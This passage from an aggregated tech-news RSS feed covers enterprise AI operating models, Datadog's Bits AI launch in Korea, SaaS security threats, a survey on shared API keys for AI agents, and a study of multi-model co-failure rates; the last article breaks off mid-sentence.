<p>If the data is fragmented, AI will produce incomplete recommendations confidently. If governance is disconnected from execution, AI can scale risk as quickly as it scales productivity.</p>



<p>The question teams ask shouldn’t be, “Where can we insert AI into this existing process?”</p>



<p>The better question is, “If we were designing this work from scratch, knowing what AI now makes possible, how should it operate?”</p>



<p>This pushes leaders to clarify where work starts, what signals matter, which decisions should be automated, where human judgment is required, what controls must be embedded, how outcomes should be measured and how the system should learn.</p>



<p>This is where CIOs, CTOs and technology leaders have an expanded role. AI transformation is no longer only about deploying technology. It is about redesigning how the enterprise works.</p>



<h2 class="wp-block-heading">Context becomes the differentiator</h2>



<p>In a world where every enterprise can access powerful models, context becomes the differentiator.</p>



<p>The winning organizations will not be the ones with the most AI tools. They will be the ones with the strongest enterprise context and the clearest path from signal to action.</p>



<p>That context includes customer history, product usage, workflow patterns, decision history, business rules, governance standards, risk boundaries, organizational knowledge and outcome feedback.</p>



<p>It also includes knowing what happened after a decision was made. Did the action improve retention? Did it accelerate a deal? Did it reduce cycle time? Did it improve customer experience? Did it create risk? Did it scale?</p>



<p>Without that feedback, AI remains a recommendation layer. With it, AI becomes part of a learning operating model.</p>



<p>This is why the most important AI investments are not always the most visible ones. Data quality, identity, access, governance, workflow integration, observability, semantic models, feedback loops and change management may not sound as exciting as the latest AI agent. But they are what allow AI to create durable enterprise value.</p>



<h2 class="wp-block-heading">The CIO as architect of the race system</h2>



<p>The CIO’s role is evolving from technology operator to architect of the enterprise race system.</p>



<p>That means connecting strategy, workflows, data, platforms, governance, security, talent and execution into an operating model that can move faster without losing control. The CIO’s job is no longer just to provide platforms. It is to design the conditions where intelligence can move safely and effectively through the enterprise with the right context, controls, accountability and feedback loops.</p>



<p>Business teams need the ability to experiment and innovate. But they need to do so within clear standards for data access, identity, security, privacy, model usage, auditability, human oversight and business accountability.</p>



<p>This is the balance every enterprise needs to strike: speed with control.</p>



<p>The future is federated innovation with centralized guardrails. It is an enterprise operating model where more people can create value with AI, but within a trusted architecture that protects the company, the customer and the quality of decisions.</p>



<p>The companies that pull ahead in the next decade will not be the ones that deployed AI first or assembled the largest portfolio of tools.</p>



<p>They will be the ones who built the enterprise equivalent of a winning Formula 1 race system: a connected operating model.</p>



<p>In Formula 1, the gap between the team that wins the championship and the team that finishes fourth is often measured in tenths of a second per lap. Compounded over a race distance, those tenths become decisive.</p>



<p>The same dynamic is emerging in enterprise AI.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[“1~2시간 걸리던 장애 분석, 5분이면 끝”…데이터독 ‘비츠 AI’ 전면에]]></title>
<description><![CDATA[데이터독 코리아는 9일 서울에서 기자간담회를 열고 이 같은 사업 현황과 연례 컨퍼런스 ‘대시(Dash) 2026’에서 공개한 신제품 전략을 소개했다.



엄수창 데이터독 코리아 지사장은 이를 시장 변화의 신호로 해석했다.



엄 지사장은 “연초만 해도 ‘SaaS 아포칼립스’라는 말이 나올 정도로 SaaS 기업들의 미래를 부정적으로 보는 시각이 많았다”며 “하지만 데이터독은 AI와 함께 성장하면서 오히려 큰 미래 비전을 갖게 됐다”고 말했다. 이어 “글로벌 상위 AI 기업 10곳 모두 데이터독을 사용하고 있다는 사실 자체가 ...]]></description>
<link>https://tsecurity.de/de/3658717/it-nachrichten/12-5-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658717/it-nachrichten/12-5-ai/</guid>
<pubDate>Fri, 10 Jul 2026 07:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>데이터독 코리아는 9일 서울에서 기자간담회를 열고 이 같은 사업 현황과 연례 컨퍼런스 ‘<a href="https://dash.datadoghq.com/" target="_blank" rel="nofollow">대시</a>(Dash) 2026’에서 공개한 신제품 전략을 소개했다.</p>



<p>엄수창 데이터독 코리아 지사장은 이를 시장 변화의 신호로 해석했다.</p>



<p>엄 지사장은 “연초만 해도 ‘SaaS 아포칼립스’라는 말이 나올 정도로 SaaS 기업들의 미래를 부정적으로 보는 시각이 많았다”며 “하지만 데이터독은 AI와 함께 성장하면서 오히려 큰 미래 비전을 갖게 됐다”고 말했다. 이어 “글로벌 상위 AI 기업 10곳 모두 데이터독을 사용하고 있다는 사실 자체가 시장이 우리의 성장 가능성을 높게 평가하고 있다는 방증”이라고 강조했다.</p>



<p>이 같은 자신감의 배경에는 AI 시대 급증하는 운영 관리 수요가 있다. 과거에는 데브옵스(DevOps)와 SRE(Site Reliability Engineering) 조직이 장애 분석과 인프라 모니터링을 위해 주로 활용했다면, 이제는 AI를 활용해 운영을 자동화하는 기능과 AI 애플리케이션 자체를 관리하는 기능까지 제공하며 AI 시대에 맞춰 사업 영역을 확대하고 있다.</p>



<p>정영석 데이터독 기술총괄은 올해 대시에서 공개한 100여 개의 신기능을 ‘자율 IT 운영(Autonomous Operations)’과 ‘AI 거버넌스’라는 두 가지 축으로 설명했다.</p>



<p>자율 IT 운영 분야에서는 ‘비츠 AI(Bits AI)’가 장애 탐지부터 원인 분석, 해결까지 자동으로 수행한다. 정 총괄은 “장애가 발생하면 비츠 AI가 8가지 안팎의 가설을 세운 뒤 하나씩 검증해 근본 원인을 찾아내고, 코드 수정안까지 PR(Pull Request) 형태로 제안한다”며 “기존에는 엔지니어가 1~2시간 걸리던 분석 및 보고서 작성 작업을 빠르면 5분 이내로 단축할 수 있다”고 설명했다.</p>



<p>또 인프라 자원이 부족하면 슬랙 등을 통해 운영자 승인만 받아 메모리와 CPU를 자동으로 증설하고, 사전에 정의한 가드레일 안에서는 무인 복구도 수행한다. 코드 변경부터 스테이징 배포, 프로덕션 환경에 이르기까지 애플리케이션이 의도대로 동작하는지도 AI가 지속적으로 검증한다.</p>



<p>AI 거버넌스 분야에서는 ▲에이전트 옵저버빌리티(Agent Observability) ▲AI 게이트웨이(AI Gateway) ▲AI 가드(AI Guard) ▲LLM 비용 관리 콘솔 등의 기능 공개했다.</p>



<p>에이전트 옵저버빌리티는 AI 에이전트 내부에서 어떤 LLM과 도구를 사용했고, 토큰과 비용이 얼마나 발생했는지 시각화한다. AI 게이트웨이는 여러 LLM을 통합 관리하고 감사(Audit)를 수행하며, AI 가드는 프롬프트 인젝션과 민감정보 유출을 차단한다.</p>



<p>정 총괄은 “코파일럿, 커서(Cursor), 클로드 등 여러 AI 모델을 함께 사용하는 기업이 늘면서 비용과 보안, 신뢰성을 통제하는 것이 C레벨 경영진의 공통 과제가 됐다”며 “개발자별, 모델별 사용량과 비용을 세분화해 보여주기 때문에 임원들도 최적화 지점을 쉽게 찾을 수 있다”고 말했다.</p>



<p>최근 많은 기업이 멀티 LLM 전략을 채택하는 만큼 이러한 통합 관리 플랫폼의 필요성도 커질 것이라는 설명이다.</p>



<p>CIO 코리아가 AI 기능 추가로 관련 비용이 늘어나는 것 아니냐고 묻자 정 총괄 “데이터독이 제공하는 수백 개의 외부 서비스 연동 기능은 모두 기본 호스트 사용료에 포함돼 있어 AI 기능이 추가됐다고 모니터링 비용이 늘어나는 것은 아니다”며 “다만 로그는 저장량이 늘어나면 비용이 증가하는 구조인데 이는 어느 벤더나 비슷하다”고 답했다.</p>



<p>이어 “AI가 추가됐다고 인프라 모니터링 비용이 올라가는 것은 아니지만 AI SRE처럼 자동 분석 기능을 사용할 경우 토큰(크레딧)이 소모돼 비용이 추가될 수 있다”며 “반면 엔지니어의 업무 시간을 크게 줄일 수 있기 때문에 ROI 측면에서는 충분히 상쇄할 수 있고, UI 대신 MCP(Model Context Protocol)를 활용하면 비용을 낮출 수 있어 국내 여러 대형 고객도 MCP 기반 AI옵스를 구축하고 있다”고 덧붙였다.</p>



<p>AI가 문제 해결책까지 제시하는 것에 대한 고객사의 거부감은 없는지 묻는 질문에는 “잘못 분석할 가능성이 있는 것은 사실이지만 지금까지 고객 반응은 매우 긍정적”이라며 “AI가 잘못 탐지하더라도 사용자가 대화를 통해 추가 분석을 요청하면 계속 수정하면서 근본 원인에 더 가까운 결과를 제시한다”고 설명했다.</p>



<p>이어 “이 경험은 ‘비츠 메모리(Bits Memory)’ 기능에 축적돼 이후 유사한 장애가 발생하면 더욱 정확하게 분석하도록 학습된다”고 말했다.</p>



<p>내부 AI는 자체 모델과 업계 최신 모델을 함께 사용하는 하이브리드 구조다.</p>



<p>정 총괄은 “프론티어 모델과 자체 모델인 ‘<a href="https://www.datadoghq.com/blog/datadog-time-series-foundation-model/" target="_blank" rel="nofollow">토토</a>(Toto)’를 함께 운영하고 있으며 작업 특성에 따라 가장 적합한 모델을 선택해 사용한다”고 밝혔다. 클로드, GPT, 제미나이 등 다양한 외부 최신 모델을 활용하며, AI SRE는 내부적으로 최적 모델이 자동 선택되지만 에이전트 빌더에서는 고객이 MCP와 사용할 모델을 직접 선택할 수 있다. 또한 LLM 옵저버빌리티에서는 환각을 탐지하기 위해 교차 검증용 모델을 별도로 지정하는 기능도 제공한다.</p>



<p>데이터독은 앞으로 옵저버빌리티(Observability), 보안, 핀옵스(FinOps), 비즈니스 인텔리전스(BI)를 하나의 플랫폼에서 통합 제공하는 차별성을 앞세워 국내 시장 공략을 확대하겠다고 밝혔다.<br>jihyun.lee@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SaaS Security Threats to Worry About, with Salesforce’s Kelly McCracken]]></title>
<description><![CDATA[Author: CrowdStrike - Bewertung: 0x - Views:4 Kelly McCracken, SVP of the Cyber Security Operations Center at Salesforce, leads one of the most complex and high-scale cyber operation environments on the planet. Today, she joins Adam and Cristian to discuss how adversaries are targeting SaaS vendo...]]></description>
<link>https://tsecurity.de/de/3658563/it-security-video/saas-security-threats-to-worry-about-with-salesforces-kelly-mccracken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658563/it-security-video/saas-security-threats-to-worry-about-with-salesforces-kelly-mccracken/</guid>
<pubDate>Fri, 10 Jul 2026 04:32:48 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: CrowdStrike - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/BK1V0eF67XE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Kelly McCracken, SVP of the Cyber Security Operations Center at Salesforce, leads one of the most complex and high-scale cyber operation environments on the planet. Today, she joins Adam and Cristian to discuss how adversaries are targeting SaaS vendors, the most underappreciated SaaS misconfigurations, and what the future of the shared responsibility model looks like.<br />
<br />
SaaS is a continuously growing target, but who is taking aim? eCrime adversaries such as SNARKY SPIDER and CORDIAL SPIDER are ones to watch, Adam says. They take advantage of poorly secured identities that make for lucrative targets. If a threat actor can log in as a legitimate user and gain access to a SaaS environment, they can reach any range of applications with poor security configurations — and exfiltrate their sensitive data.<br />
<br />
The shared responsibility model is essential to defense. Businesses must understand what their vendors are responsible for securing and what they’re responsible for securing. A lack of configurations and policies opens the door to both external adversaries and insider threats.<br />
<br />
“I feel like most security teams are flying blind when it comes to what’s going on with some of the most precious data for their company,” Kelly says.<br />
<br />
Tune in for a deep-dive conversation on one of the most prominent threats facing businesses today and stick around to hear about Cristian’s latest culinary fail and Kelly’s elite Latin skills.<br />
<br />
🔗 Links:<br />
<br />
🎧 Spotify: https://cs.link/uissX<br />
🎧 Apple Podcasts: https://cs.link/uissY<br />
🎧 Our site: https://cs.link/uissZ<br />
<br />
📣 Connect With Us:<br />
<br />
► X:<br />
https://twitter.com/CrowdStrike<br />
► Instagram:<br />
https://www.instagram.com/crowdstrike<br />
► LinkedIn:<br />
https://www.linkedin.com/company/crowdstrike<br />
<br />
🔔 Subscribe to stay updated!<br />
<br />
#CrowdStrike #AdversaryPodcast #Salesforce<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[US Weighs Removing Steering Wheel Requirement for Driverless Cars]]></title>
<description><![CDATA[The move would benefit companies such as Tesla, which are already designing in that direction.]]></description>
<link>https://tsecurity.de/de/3658348/it-nachrichten/us-weighs-removing-steering-wheel-requirement-for-driverless-cars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658348/it-nachrichten/us-weighs-removing-steering-wheel-requirement-for-driverless-cars/</guid>
<pubDate>Fri, 10 Jul 2026 00:17:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The move would benefit companies such as Tesla, which are already designing in that direction.]]></content:encoded>
</item>
<item>
<title><![CDATA[Shared API keys expose AI agents at 69% of enterprises, new VentureBeat research finds]]></title>
<description><![CDATA[Share one API key across five AI agents, and a single compromised agent inherits the reach of all five. The attacker immediately benefits from the accumulated permissions of every workflow that the key touches. The forensic trail goes cold at the credential level because five agents on one accoun...]]></description>
<link>https://tsecurity.de/de/3658311/it-nachrichten/shared-api-keys-expose-ai-agents-at-69-of-enterprises-new-venturebeat-research-finds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658311/it-nachrichten/shared-api-keys-expose-ai-agents-at-69-of-enterprises-new-venturebeat-research-finds/</guid>
<pubDate>Thu, 09 Jul 2026 23:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Share one API key across five AI agents, and a single compromised agent inherits the reach of all five. The attacker immediately benefits from the accumulated permissions of every workflow that the key touches. The forensic trail goes cold at the credential level because five agents on one account leave no record of which agent did what.</p><p>Sixty-nine percent of enterprises run agents with credential sharing somewhere in their deployments, according to VentureBeat’s June 2026 <a href="https://venturebeat.com/category/resources">Pulse Research</a> wave of 107 enterprises. </p><p>That one number explains the buying spree reshaping enterprise security this year. Palo Alto Networks, CrowdStrike, and Cisco have collectively bet more than $22 billion on it in the past year, targeting exactly the layer most enterprises in this survey haven't finished building. </p><p>Palo Alto Networks completed its acquisition of CyberArk on February 11 for <a href="https://venturebeat.com/security/link">$21.1 billion in total consideration</a> at close — a deal it <a href="https://venturebeat.com/security/link">announced last July at roughly $25 billion</a> and the largest in the company's history.</p><p>CrowdStrike <a href="https://venturebeat.com/security/link">closed its $740 million acquisition</a> of runtime authorization platform SGNL and, by June 15, <a href="https://venturebeat.com/security/link">shipped the first product from the deal, Continuous Identity for AI Agents</a>. CrowdStrike integrated SGNL in less than a year, delivering a product that validates every agent action in real time based on who owns it, who is calling it, and the device's risk posture.</p><p>Cisco <a href="https://venturebeat.com/security/link">announced its intent to acquire</a> non-human identity specialist Astrix Security on May 4 for a reported <a href="https://venturebeat.com/security/link">$400 million</a>.</p><p>For a security director, this survey reads as a board-level question, not a trend line. It also surfaces a finding no competitor’s data shows, one that exposes which companies are the most at risk.</p><p>The data below is the first look at VentureBeat’s Q2 Agentic Security report, drawn from 107 qualified respondents at organizations with more than 100 employees. The full report will be released to attendees at <a href="https://venturebeat.com/vbtransform2026?gad_source=1&amp;gad_campaignid=23980639323&amp;gbraid=0AAAAADnGhh6a1PPkuB60-_ayDUaXOZo3h&amp;gclid=Cj0KCQjwjb3SBhDgARIsAMKiWziNibd4i5buzaXuw91BVLngDsyqVdgLZBQxUTUBkbuWlmUGubj-fMYaAowKEALw_wcB">VB Transform</a>, the event in Menlo Park next week (July 14-15) focusing on enterprise autonomous agents. </p><p>Forty-five percent are final decision-makers for AI purchases. The sample skews mid-market, so read the numbers as the view from organizations adopting agent security right now rather than from the largest enterprises. </p><p>More than half of respondents, 54%, have already had an agent security incident or near-incident. Eighteen percent confirmed an incident, and thirty-six percent caught a near-miss before a breach. Security teams are stopping most of these events at the last control point in the chain, but the rest of the data shows how thin that margin is.</p><h2>Your agents are sharing credentials</h2><p>Only 32% of enterprises give every AI agent its own scoped, managed identity. Nearly half (48%) report that some agents have scoped identities, while many still share credentials. Another 32% say agents mostly run on shared API keys or borrowed human and service-account credentials. The survey question allowed more than one selection, and 24 of the 107 respondents chose multiple options — which is why the three categories sum to 112%. Deduplicated by respondent, 74 organizations, or 69%, flagged credential sharing in at least one answer.</p><p>One number explains why the acquisitions target this layer. A shared credential converts a single compromised agent into many, and <a href="https://www.cyberark.com/press/machine-identities-outnumber-humans-by-more-than-80-to-1-new-report-exposes-the-exponential-threats-of-fragmented-identity-security/">CyberArk's research</a> puts machine identities at 82 for every human in organizations worldwide, with agents as the fastest-growing category of the ratio. Cisco made the same diagnosis when it bought Astrix, whose founders built the company around API keys, service accounts, and OAuth tokens. Cisco’s announcement calls those the credentials AI agents are now “using (and abusing)” to execute work at scale.</p><p>Adam Meyers, senior vice president of counter adversary operations at CrowdStrike, described the mechanism directly in an interview with VentureBeat. Some AI systems have their own identities, he said, and in other cases “people give their identity to the AI to take action on their behalf, and that also further kind of murkies the water and makes it very complex.” The murk is the point, because when the identity is shared, attribution dies with it.</p><h2>Exposure scales with size, and containment does not</h2><p>Forty-nine percent of enterprises enforce scoped permissions at runtime, and 47% monitor and log agent activity, which can help reduce security incidents. Only 30% sandbox their highest-risk agents, the one control that limits blast radius when the first two fail. Isolation is what keeps a single compromised agent from becoming a deployment-wide event. Enterprises have funded detection and resistance, but the containment layer barely exists.</p><p>The sharpest finding in the survey, and the one no vendor report captures, shows up when you split results by company size. The incident rate is 49% for companies with 101 to 1,000 employees, but it shoots up to 63% for companies with more than 1,000. Sandbox isolation moves the other way, falling from 35% to 20% at the larger companies.</p><p>The chart above shows the same finding at finer granularity: the 49%/63% split above is a binary cut at 1,000 employees, while the bars here break incident rate and isolation rate into four size bands. The red line measures incidents and near-misses, and the navy tracks the one control that contains damage after everything else fails. At organizations with 101 to 250 employees, the two sit 7 points apart, but above 5,000, the gap blows out to 60 points. That top band pools the survey's two largest size groups and holds only 15 respondents, so treat the number as directional. Larger enterprises run more agents across more systems, which drives incidents up while sandboxing, the engineering project that would contain them, goes unfunded. The enterprises with the most agents have the least isolation around them.</p><p>The deals target exactly those accounts. Palo Alto Networks, Cisco, and CrowdStrike sell to large enterprises first, where incident rates are highest and containment is the thinnest.</p><h2>Guarded by whoever shipped the model</h2><p>The model providers are the security layer. OpenAI's built-in guardrails lead at 51%. Google Cloud reaches 36%, Microsoft Azure's Purview and Copilot Studio DLP 35%, and Anthropic's managed-agent controls 29%. Eighty-two percent of respondents name a provider-native or hyperscaler control as their single primary agent security layer.</p><p>The purpose-built specialists are in single digits, with Palo Alto Networks' Prisma AIRS at 7%, CrowdStrike at 6%, and Okta for AI Agents at 4%. Zenity and the dedicated non-human identity platforms are at 3% each. Microsoft Entra Agent ID is the highest-penetration identity-specific control in the dataset at 13%, the only one from a hyperscaler, and it still falls outside the top four. Only 5% of enterprises run no dedicated agent tooling at all, and the rest have tooling that came pre-installed.</p><p>Bundled controls lead because they ship free and are enabled by default. Most filter prompts and outputs, but they do not give an agent its own identity or sandbox it. Hyperscalers sell identity-layer products, and Entra Agent ID is in the dataset at 13%, but adoption stays low. The two controls that reward incident data the most, scoped identity and isolation, are the two that the default stack does not include.</p><p>Prompt-and-output filters evaluate whether a call looks malicious. That is an intent problem, and intent cannot be solved at the language layer. CrowdStrike CTO Elia Zaitsev drew the line in an <a href="https://venturebeat.com/security/rsac-2026-agent-identity-frameworks-three-gaps">interview at RSAC 2026</a>. "Observing actual kinetic actions is a structured, solvable problem," Zaitsev said. "Intent is not." CrowdStrike's Falcon sensor walks the process tree on an endpoint and tracks what agents did, not what agents appeared to intend. A scoped identity and an isolation boundary give that sensor something to track, while a shared credential on a bundled guardrail does not.</p><p>Cloud security went through the same cycle a decade ago, and Palo Alto Networks, CrowdStrike, and Wiz built multi-billion-dollar businesses on the gaps native cloud controls left open. Agent security is tracking the same path faster. A misconfigured storage bucket sat open until a human noticed. A misconfigured agent exploits its own over-permissioning on every run, and no human is watching when it does. Merritt Baer, chief security officer at <a href="https://www.enkryptai.com/">Enkrypt AI</a> and a former deputy CISO at AWS, <a href="https://venturebeat.com/security/most-enterprises-cant-stop-stage-three-ai-agent-threats-venturebeat-survey-finds">told VentureBeat</a> that the default layer is thinner than enterprises assume. "Enterprises believe they've 'approved' AI vendors, but what they've actually approved is an interface, not the underlying system," Baer said. "The real dependencies are one or two layers deeper, and those are the ones that fail under stress."</p><h2>Comfortable, unconvinced, and already shopping</h2><p>Here is the contradiction worth a keynote slide. Enterprises rate their agent security tooling 4.2 out of 5, with value for money at 4.1 and ease of implementation at 3.9. Those scores would make most SaaS vendors envious.</p><p>Only 35% believe their AI-enabled defenses are ahead of AI-enabled attackers, while thirty-two percent call it roughly even. Twenty-one percent say attackers lead, and another 21% say it is too early to tell, showing how enterprises trust their tooling more than they trust its outcomes.</p><p>Budgets confirm it. Forty-six percent allocate 6 to 10% of the security budget to agent security, and a full third spend 5% or less. Half the sample has already had an incident or near-miss, but the funding does not match the exposure.</p><p>Fifty-nine percent plan to adopt, add, or replace agent security tooling within 12 months, and twenty-nine percent plan to move this quarter. OpenAI leads forward interest at 34%, followed by Google at 30%, Anthropic at 29%, and Azure at 25%. The dedicated vendors draw more interest looking forward than their current single-digit footprint suggests. Satisfied customers do not reshuffle this fast unless they know the stack they're currently using is provisional.</p><h2><b>Three moves for security directors </b></h2><p><b>1. Inventory every agent’s credentials this quarter.</b> Map which agents share credentials with other agents and which run on borrowed human or service-account identities. The goal is not one credential per agent. Agents that touch multiple systems need multiple scoped identities. The goal is zero shared credentials between agents and zero borrowed human identities. Thirteen percent of surveyed enterprises already run Microsoft Entra Agent ID. Okta for AI Agents and the non-human identity specialists sell equivalents. Shared and borrowed credentials are the first thing to eliminate.</p><p><b>2. Sandbox the riskiest agents first.</b> Isolation is the least-adopted control at 30% and the only one that contains blast radius after prevention fails. Rank agents by the sensitivity of what they touch and isolate the top of the list. Above 1,000 employees, where isolation falls to 20%, this is the single highest-return move in the dataset. Sandboxing does not require replacing the agent or the platform. It requires a policy decision and an isolation layer.</p><p><b>3. Match the budget to the incident rate. </b>A third of enterprises fund agent security at 5% or less of the security budget, even though more than half have already had an incident or near-miss. Nine percent allocate more than 25% today. The full report breaks out exposure and containment by company size, showing which bands carry the most risk and the least protection.</p><p>The board's question is simpler. If one of our AI agents was compromised this afternoon, which systems did it touch, and whose credentials was it holding? For the 69% of enterprises running agents on shared credentials, the answer is a shrug. The trail goes cold at the key.</p><p>The full Q2 Agentic Security report, with the complete vendor matrix, industry cuts, and the full dataset behind these charts, debuts July 14 and 15 at <a href="https://venturebeat.com/vbtransform2026">VB Transform</a>, held at Hotel Nia in Menlo Park. The open question it leaves is whether enterprises close the agent security gap on their own terms, or whether a confirmed breach closes it for them.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Who you gonna call?]]></title>
<description><![CDATA[GhostApproval puts AI coding assistants under the microscope. Microsoft fixes the RoguePlanet zero-day. More than 70 cybersecurity firms back a new AI Charter. An Ohio county may have paid a $1 million ransom. AssuranceAmerica discloses a breach affecting nearly seven million people. Australia br...]]></description>
<link>https://tsecurity.de/de/3658216/it-security-nachrichten/who-you-gonna-call/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658216/it-security-nachrichten/who-you-gonna-call/</guid>
<pubDate>Thu, 09 Jul 2026 22:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GhostApproval puts AI coding assistants under the microscope. Microsoft fixes the RoguePlanet zero-day. More than 70 cybersecurity firms back a new AI Charter. An Ohio county may have paid a $1 million ransom. AssuranceAmerica discloses a breach affecting nearly seven million people. Australia bricks thousands of broadband routers. Israeli fintech Nayax reports a cyber incident. KDDI confirms a massive telecom data breach. A global anti-fraud operation leads to thousands of arrests. Ben Yelin from University of Maryland Center for Cyber Health and Hazard Strategies explains the EU Cloud and AI Development Act. Slopfix fights fire with fire.]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprises using multiple AI models are underestimating failure rates by 2.25x]]></title>
<description><![CDATA[A team routing queries across a coding specialist, a logic specialist, and a generalist model assumes each will cover the others' blind spots. A new study evaluating 67 frontier models from 21 providers shows that assumption is mathematically flawed — and the flaw has a name: the co-failure ceili...]]></description>
<link>https://tsecurity.de/de/3658055/it-nachrichten/enterprises-using-multiple-ai-models-are-underestimating-failure-rates-by-225x/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658055/it-nachrichten/enterprises-using-multiple-ai-models-are-underestimating-failure-rates-by-225x/</guid>
<pubDate>Thu, 09 Jul 2026 21:02:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A team routing queries across a coding specialist, a logic specialist, and a generalist model assumes each will cover the others' blind spots. <a href="https://arxiv.org/abs/2606.27288">A new study</a> evaluating 67 frontier models from 21 providers shows that assumption is mathematically flawed — and the flaw has a name: the co-failure ceiling.</p><p>The assumption works like this: as long as two models don't usually fail on the exact same prompts, combining them is supposed to create a safety net against failures.</p><p>The real limit on orchestration is not how often models disagree, but the percentage of prompts where every model in the pool gives the wrong answer at once. By ignoring the co-failure ceiling, enterprises are building complex, expensive routing infrastructure to chase performance gains that do not exist. Fortunately, developers can use this same math to build a cost-free test that determines exactly when multi-model orchestration will actually pay off.</p><h2>The hidden costs of the multi-model strategy</h2><p>To orchestrate multiple language models, developers typically rely on three architectures. <a href="https://venturebeat.com/technology/new-1-5b-router-model-achieves-93-accuracy-without-costly-retraining">Model routers</a> act as traffic cops, sending complex queries to expensive models and simple queries to cheaper ones. Cascades send every prompt to a cheap model first, only escalating to a premium model if the initial system signals low confidence. Finally, approaches like <a href="https://bdtechtalks.com/2025/02/17/llm-ensembels-mixture-of-agents/">Mixture-of-Agents</a> (MoA) fuse multiple models by asking them the same question and generating a synthesized answer from their combined outputs.</p><p>These architectures introduce a "shadow price" to inference costs. Every time a development team implements a router or a cascade, they pay a premium in added system latency, complex infrastructure maintenance, and increased governance risks across multiple API providers.</p><p>To justify these operational costs, engineers rely on “pairwise error correlation” to select their model pool. Imagine a developer has Model A, which writes excellent Python but fails at SQL, and Model B, which writes excellent SQL but fails at Python. Because they fail on different types of prompts, their pairwise error correlation is low. The developer assumes that by placing a routing layer in front of them, they have created a composite system that rarely fails at coding.</p><p>According to the study, throwing diverse models together based on low correlation can actually hurt performance if the models are not equally capable — when you vote across diverse but unequal models, the weaker ones often gang up and outvote the smartest one.</p><p>Josef Chen, author of the paper, told VentureBeat that in their experiments, "Naive majority voting across unequal models had negative mean gain (minus 10 points on our hard mix): diverse-but-weaker members outvote the strong one." The actionable advice for developers is to "combine only models within a matched quality band." If you cannot match quality, take the single-model baseline and spend your budget on the best model available.</p><p>The paper provides one bright spot for this approach regarding MoA architectures. When building ensembles, teams often use "Self-MoA," where they query the same premium model multiple times to generate a synthesized answer. The researchers found that at matched quality, building a diverse ensemble of models with low pairwise correlation beats a high-correlation Self-MoA setup.</p><p>However, when teams use that same pairwise correlation metric to predict the absolute accuracy of their overall system, the math breaks down.</p><p>"So teams pay the orchestration overhead up front (latency, complexity, multi-provider operations) on the assumption that a diversity dividend arrives later," Chen said. "Usually it doesn't, because today's best models agree, and, worse, they fail on the same queries … the prompt simply carries little signal about which model will be the one that's right when the frontier disagrees."</p><h2>Why the math fails: the co-failure ceiling</h2><p>The core finding of the study centers on a metric called the "co-failure rate" — the formal name for the all-wrong scenario described above. No router, voting system, or cascade can ever achieve an accuracy higher than the ceiling it imposes.</p><p>The coding, logic, and generalist pool shows low pairwise correlation on routine prompts — they rarely fail together. But the co-failure ceiling represents the obscure, highly complex edge case that pushes past the limits of current AI architectures. If a prompt is so difficult that all three models hallucinate or fail, it does not matter how intelligently the router distributes the task. The entire pool wipes out at once.</p><p>The researchers tested their 67-model pool, which included GPT-5.5, Claude Opus 4.8, and Gemini 3.1 Pro, on the open-ended MATH-500 math benchmark. Based on standard pairwise correlation, statistical models predicted that the entire pool would wipe out simultaneously on only 2.3% of the questions. In reality, the co-failure rate was 5.2%.</p><p>Standard correlation metrics underestimated the failure rate by roughly 2.25 times. The culprit is not just independent difficulty, but a shared failure point.</p><p>"The driver is what we call a common-mode atom: a slice of queries on which the entire market fails together, which no pairwise statistic can see," Chen said. "Adding a 20th model to your pool doesn't buy tail coverage. The tail is shared."</p><p>The researchers also found that task format directly triggers co-failure. When they took graduate-level science questions from the GPQA benchmark and changed them from multiple-choice to free-response formats, the all-wrong tail expanded to 12.7%.</p><p>Developers can engineer around the ceiling, though. "The engineering implication is uncomfortable: multi-model setups buy the least exactly where teams want them most, on open-ended generation," Chen said. "Anywhere you can convert generation into verification or constrained selection (structured outputs, checkable answers, execution tests), you reopen the ceiling."</p><p>Ultimately, the researchers found this ceiling limits AI applications in two distinct ways, depending on the domain:</p><ul><li><p><b>Ceiling-bound environments (e.g., open-ended math):</b> The co-failure rate is high. The task is too hard, and all models fail simultaneously. No amount of routing can bypass the lack of underlying capability.</p></li><li><p><b>Realizability-bound environments (e.g., graduate-level science):</b> The co-failure rate is near zero, meaning at least one model in the pool usually knows the answer. However, the models disagree so subtly that a routing layer cannot reliably pick the correct answer without an omniscient oracle.</p></li></ul><h2>The $0 pre-deployment sanity check</h2><p>Before dedicating engineering hours to building a router, teams can calculate their absolute performance ceiling for free using a mathematical formula called a Clopper-Pearson bound.</p><p>The Clopper-Pearson bound operates as a worst-case scenario calculator. If you flip a coin ten times and get eight heads, you cannot guarantee the coin will land on heads 80% of the time forever. The bound takes a small sample of test questions and outputs 